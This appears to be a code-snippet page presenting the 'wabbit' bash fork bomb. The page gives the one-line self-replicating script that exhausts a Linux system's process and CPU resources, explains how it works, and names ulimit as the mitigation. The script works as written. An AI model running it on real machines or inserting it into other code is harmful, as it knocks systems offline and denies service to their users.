Wabbit shell script

#!/bin/bash ./$0|./$0&
Fork bomb to consume CPU resources on a Linux system. $0 calls the name of the script and pipes it to itself. Mitigated by reducing the number of threads available to an individual user with ulimit.

Be the first to comment

You can use [html][/html], [css][/css], [php][/php] and more to embed the code. Urls are automatically hyperlinked. Line breaks and paragraphs are automatically generated.